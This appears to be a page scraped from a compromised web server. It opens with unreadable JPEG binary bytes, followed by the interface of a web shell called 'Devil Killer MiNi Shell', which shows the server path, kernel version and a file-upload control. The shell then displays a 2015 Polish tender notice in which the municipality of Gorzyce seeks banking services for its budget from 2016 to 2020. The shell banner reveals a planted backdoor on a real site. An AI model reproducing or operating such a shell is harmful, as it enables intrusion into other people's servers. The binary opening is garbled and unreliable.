JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151203/178367-N-2015.html

<p class="kh_header"><b>Gorzyce: Bankową obsługę budżetu Gminy Gorzyce w latach 2016-2020</b><br>
<b>Numer ogłoszenia: 178367 - 2015; data zamieszczenia: 03.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gorzyce , ul. Kościelna 15, 44-350 Gorzyce, woj. śląskie, tel. 32 4513056 w.11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorzyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bankową obsługę budżetu Gminy Gorzyce w latach 2016-2020.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:
1) prowadzenie rachunku bieżącego i rachunków pomocniczych Gminy Gorzyce, rachunków bieżących i pomocniczych gminnych jednostek budżetowych, zakładu budżetowego - Gminnego Ośrodka Turystyki Sportu i Rekreacji Nautica w Gorzycach, gminnych  instytucji kultury (WDK w Czyżowicach, Gorzycach i Olzie) oraz Gminnej Biblioteki Publicznej w Gorzycach z siedzibą w Rogowie w oparciu o odrębne umowy zawarte                z poszczególnymi jednostkami. Wszystkie rachunki będą oprocentowane na identycznych zasadach przy zastosowaniu preferencji banku takich jak dla klientów strategicznych,

2)   udostępnienie usługi Identyfikacji Przychodzących Płatności Masowych, zwanych dalej IPPM, polegającej na identyfikacji i przetwarzaniu wpłat masowych. Wpłaty masowe powinny być dokonywane na rachunek rozliczeniowy gminy za pośrednictwem indywidualnego, nierzeczywistego numeru rachunku wygenerowanego przez gminę, zgodnie z postanowieniami umowy z Wykonawcą,
 
3)  możliwość zaciągania kredytu w rachunku bieżącym gminy do wysokości zgodnej z treścią uchwały Rady Gminy w sprawie budżetu gminy na poszczególne lata. Zmiana wysokości kredytu będzie dokonywana w formie pisemnej tj. aneksu do umowy ogólnej. Dla wyliczenia kosztu kredytu na dzień złożenia oferty przyjmuje się wielkość kredytu w wysokości 4.000.000,00 zł.,

4)   możliwość wielostanowiskowego wdrożenia programu do obsługi rachunków, o których mowa w pkt 1 drogą elektroniczną (home banking). Program będzie zainstalowany w następującej konfiguracji (według stanu na dzień ogłoszenia zamówienia):
- Urząd Gminy Gorzyce - 2 stanowiska;
- Ośrodek Pomocy Społecznej - 1 stanowisko;
- Gminny Zespół Obsługi Finansowej -  1 stanowisko;
- Gminny Ośrodek Sportu i Rekreacji Nautica - 1 stanowisko;
- Wiejski Dom Kultury w Czyżowicach - 1 stanowisko;
- Wiejski Dom Kultury w Gorzycach - 1 stanowisko;
- Wiejski Dom Kultury w Olzie - 1 stanowisko;
- Gminna Biblioteka Publiczna w Gorzycach - 1 stanowisko;
- Świetlica Profilaktyczno - Wychowawcza w Gorzyczkach - 1 stanowisko.

Uwagi:
System elektronicznej obsługi rachunków musi umożliwiać komunikację z bankiem bezpośrednio  z komputera, na którym jest zainstalowany. Łączność z bankiem powinna następować na zasadzie bezpośredniej komunikacji tj. komputer użytkownika - serwer bankowy. Program powinien umożliwiać pracę  (np. przygotowywanie przelewów) w trybie offline. System musi być wyposażony w zabezpieczenia gwarantujące bezpieczeństwo jego funkcjonowania (m.in. szyfrowany podpis dyspozycji przelewów itp.),

5)     w trakcie obowiązywania umowy możliwość rozszerzenia konfiguracji, o której mowa w pkt 3, na wniosek zainteresowanych jednostek organizacyjnych.
	
3. Wykaz jednostek organizacyjnych gminy, dla których prowadzenie rachunków objęte jest niniejszym postępowaniem:		
- Gmina Gorzyce
- Urząd Gminy Gorzyce
- Ośrodek Pomocy Społecznej w Gorzycach
- Gminny Zespół Obsługi Finansowej w Gorzycach
- Gminny Ośrodek Sportu i Rekreacji Nautica  w Gorzycach
- Wiejski Dom Kultury w Czyżowicach
- Wiejski Dom Kultury w Gorzycach
- Wiejski Dom Kultury w Olzie
- Gminna Biblioteka Publiczna w Gorzycach
- Świetlica Profilaktyczno - Wychowawcza w Gorzyczkach
- Gimnazjum w Czyżowicach
- Gimnazjum w Gorzycach
- Gimnazjum w Rogowie
- Gimnazjum w Turzy Śląskiej
- Szkoła Podstawowa w Bluszczowie
- Szkoła Podstawowa w Czyżowicach
- Szkoła Podstawowa Nr 1 w Gorzycach
- Szkoła Podstawowa Nr 2 w Gorzycach
- Szkoła Podstawowa w Olzie
- Szkoła Podstawowa w Rogowie
- Szkoła Podstawowa w Turzy Śl.
- Przedszkole Publiczne w Czyżowicach
- Przedszkole Publiczne w Gorzycach
- Przedszkole Publiczne w Olzie
- Przedszkole Publiczne w Rogowie
- Przedszkole Publiczne w Turzy Śląskiej
- Zespół Szkolno - Przedszkolny w Gorzyczkach (Zespół prowadzi oddzielne rachunki dla Szkoły Podstawowej 
i Przedszkola Publicznego w Gorzyczkach).

4. Z wymienionych w pkt 1.3. jednostek Gmina Gorzyce posiada 3 rachunki podstawowe, 1 rachunek pomocniczy na masowe płatności podatkowe oraz 16 rachunków pomocniczych, pozostałe jednostki posiadają po jednym rachunku podstawowym każda oraz rachunki pomocnicze, każda co najmniej jeden. Na dzień ogłoszenia przetargu, niniejszym postępowaniem  objęte są 91 rachunki bankowe.  W okresie obowiązywania umowy ilość jednostek organizacyjnych gminy oraz rachunków może ulec zmianie. (Na dzień dzisiejszy jest jeszcze dodatkowy r-k bankowy na masowe płatności podatkowe)

5. Przewiduje się, że w okresie 5 - ciu lat, wykonane zostaną następujące operacje:

1) Opłaty  związane z 3 rachunkami bieżącymi Gminy Gorzyce:
a) za otwarcie  rachunku
b) za prowadzenie  rachunku
c) inne ewentualne opłaty  jakie poniesie Zamawiający w zakresie określonym w niniejszej specyfikacji

2) Opłaty związane z 25 rachunkami bieżącymi pozostałych jednostek:
a) za otwarcie jednego rachunku,
b) za prowadzenie jednego rachunku,
c) inne ewentualne opłaty jakie poniesie Zamawiający w zakresie określonym w niniejszej specyfikacji,

3) Opłaty  związane z 63 rachunkami  pomocniczymi
a) za otwarcie jednego rachunku,
b) za prowadzenie jednego rachunku,
c) inne ewentualne opłaty jakie poniesie Zamawiający w zakresie określonym w niniejszej specyfikacji.

4) Prowizje stosowane w ramach prowadzenia 91 rachunków
a) przelewy
-  przewiduje się 200 000 szt. przelewów (papierowe i elektroniczne),
b) pobieranie gotówki z banku (do kas jednostek)
- przewiduje się 2000 krotne pobieranie gotówki,
c) inne ewentualne prowizje jakie poniesie Zamawiający w zakresie określonym w niniejszej specyfikacji,
d)    wpłaty gotówkowe (o których mowa w pkt 1.5. ppkt 1 SIWZ,
e)    czeki o których mowa w pkt 1.5. ppkt 3, 4, 6 SIWZ.

5) Koszty obsługi 91 rachunków drogą elektroniczną:
a) koszty instalacji programu oraz szkolenia,
b) wielkość opłat za korzystanie z oprogramowania,
c) przyjmuje się, że dysponentami rachunków bieżących i pomocniczych obsługiwanych drogą elektroniczną będą:
- Urząd Gminy Gorzyce - 2 stanowiska;
- Ośrodek Pomocy Społecznej - 1 stanowisko;
- Gminny Zespół Obsługi Finansowej -  1 stanowisko;
- Gminny Ośrodek Sportu i Rekreacji Nautica - 1 stanowisko;
- Wiejski Dom Kultury w Czyżowicach - 1 stanowisko;
- Wiejski Dom Kultury w Gorzycach - 1 stanowisko;
- Wiejski Dom Kultury w Olzie - 1 stanowisko;
- Gminna Biblioteka Publiczna w Gorzycach - 1 stanowisko;
- Świetlica Profilaktyczno - Wychowawcza w Gorzyczkach - 1 stanowisko
- inne jednostki, które wystąpią do Wykonawcy z wnioskiem o obsługę rachunków drogą elektroniczną
d) wszystkie rachunki przypisane danemu dysponentowi (bieżące i pomocnicze) będą  obsługiwane drogą elektroniczną.

6. Warunki dodatkowe, jakie spełniać musi oferta:

1) wpłaty gotówkowe dokonywane na rzecz gminy przez inkasentów opłaty targowej oraz inkasentów opłat pobieranych za pobyt i wyżywienie dzieci w przedszkolach i szkołach na rachunki Gminy Gorzyce oraz jednostek oświatowych, objęte niniejszym postępowaniem, nie będą obciążane żadną opłatą bankową bądź prowizją (ok. 500 wpłat).

2)na rachunkach objętych postępowaniem odsetki od dodatniego salda dopisywane będą nie rzadziej niż w cyklach miesięcznych;

3)Zamawiający na wniosek bezpłatnie otrzyma czeki do rachunków objętych niniejszym postępowaniem;

4)Zamawiający bez dodatkowych kosztów będzie otrzymywał wyciągi i dowody wpłat i wypłat z rachunków objętych niniejszym postępowaniem, w następnym dniu roboczym po dniu dokonania operacji;

5) Zamawiający zastrzega sobie możliwość funkcjonowania niektórych rachunków, na wniosek Wójta Gminy lub kierownika jednostki, na zasadach bez kosztowych tj. bez naliczania odsetek od dodatniego salda oraz bez pobierania opłat i prowizji za prowadzenie tych rachunków (np. na rachunkach związanych z pozyskanymi funduszami zewnętrznymi w zależności od sposobu rozliczania danego funduszu,

6)zabezpieczeniem kredytu w rachunku bieżącym gminy będzie weksel własny -in blanco- kredytobiorcy wraz z deklaracją wekslową;

7) Wykonawca w ramach oferty skalkuluje wszelkie opłaty i prowizje za prowadzenie rachunków, obsługę systemu bankowości elektronicznej, oraz odsetki od kredytu w rachunku bieżącym gminy w okresach miesięcznych. Prowizję od kredytu w rachunku bieżącym gminy bank pobierze w przypadku podpisania umowy kredytowej przez Zamawiającego.
Uwaga: umowa kredytowa zostanie podpisana przez Zamawiającego w przypadku zaistnienia faktycznej potrzeby zaciągnięcia kredytu;

8) przedmiot zamówienia obejmuje również otwarcie dodatkowych rachunków dla jednostek wymienionych w pkt 1.3. lub nowych jednostek utworzonych przez Zamawiającego - nie więcej niż 15 szt..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Do 20 % zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2020.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni być bankiem i wykonywać czynności bankowe na podstawie ustawy prawo bankowe z dnia 29.08.1997 r. ( t.j. Dz. U. z 2015 r., poz. 128 ze zm.)
Ocena spełniania warunku dokonana będzie na podstawie informacji zawartych w oświadczeniu o spełnieniu warunków udziału w postępowaniu oraz dostarczonych dokumentach,  metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wykonywał/wykonuje minimum 
1 usługę odpowiadającą swym rodzajem usłudze stanowiącej przedmiot zamówienia, tj.: w zakresie obsługi budżetu co najmniej 1 jednostki samorządu terytorialnego, innej jednostki administracji publicznej lub o podobnym profilu działania.
Ocena spełniania warunku dokonana będzie na podstawie informacji zawartych w oświadczeniu o spełnieniu warunków udziału w postępowaniu oraz dostarczonych dokumentach,  metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by Wykonawca posiadał lub zadeklarował, że utworzy w terminie do 30 dni od daty podpisania umowy, oraz utrzymają w okresie realizacji umowy, placówkę/placówki na terenie gminy Gorzyce zgodnie z następującymi standardami:  placówkę/placówki, w której/ych łącznie funkcjonują dwie kasy czynne przez co najmniej 5 dni w tygodniu i co najmniej 7 godzin dziennie; kasy przyjmować będą wpłaty gotówkowe bez ograniczeń kwotowych (zgodnie z obowiązującymi przepisami); w placówce muszą być stworzone warunki do pobierania gotówki przez upoważnionych pracowników Zamawiającego i jednostek organizacyjnych gminy w sposób dyskretny, poza kolejnością, w kwocie do 20.000,00 zł;  w przypadku nie wywiązania się banku w terminie z powyższych warunków umowa może zostać rozwiązana za 30 dniowym wypowiedzeniem
Ocena spełniania warunku dokonana będzie na podstawie informacji zawartych w oświadczeniu o spełnieniu warunków udziału w postępowaniu oraz dostarczonych dokumentach,  metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana będzie na podstawie informacji zawartych w oświadczeniu o spełnieniu warunków udziału w postępowaniu,  metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.: winien osiągnąć współczynnik wypłacalności w wysokości minimum 12%, obliczony zgodnie ze standardami Narodowego Banku Polskiego za 2014 rok a bank rozpoczynający działalność operacyjną na poziomie co najmniej 15% przez pierwsze 12 miesięcy działalności, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
Ocena spełniania warunku dokonana będzie na podstawie informacji zawartych w oświadczeniu o spełnieniu warunków udziału w postępowaniu oraz dostarczonych dokumentach,  metodą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany formularz oferty 
2. Pełnomocnictwo - jeżeli dotyczy.
3. Zobowiązania innych podmiotów - jeżeli dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Koszty prowizji, opłat  i odsetek związanych z kredytem w rachunku - 15</li>
<li>3 - Oprocentowanie środków na rachunkach bankowych - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują możliwość dokonania istotnych zmian postanowień umowy w niżej wymienionych przypadkach;
	a)  zmian w przepisach prawnych,
	b)  zmian organizacyjnych zarówno po stronie Wykonawcy jak i Zamawiającego,
	c) zmiana wynagrodzenia należnego Wykonawcy w przypadku: 
- zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, 
- zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, 
przy czym zmiana wynagrodzenia nastąpi w przypadku gdy ww. zmiany będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. 
	d)  wprowadzenia zmiany korzystnej dla Zamawiającego.
Warunki dokonywania zmian:
	a) zmiana może być inicjowana na wniosek Wykonawcy lub Zamawiającego a strona wnioskująca zobowiązana jest do jej szczegółowego uzasadnienia lub/i wskazania postawy prawnej  i umownej,
	b) zmiana musi uzyskać aprobatę obu stron umowy,
	c) zmiana musi być zgodna z SIWZ oraz ustawą Prawo Zamówień Publicznych,
	d) zmiana musi być wprowadzona w formie pisemnej w postaci aneksów pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.bip.gorzyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Gorzycach, ul. Kościelna 15, 44-350 Gorzyce, pokój nr 3 (parter).</p>
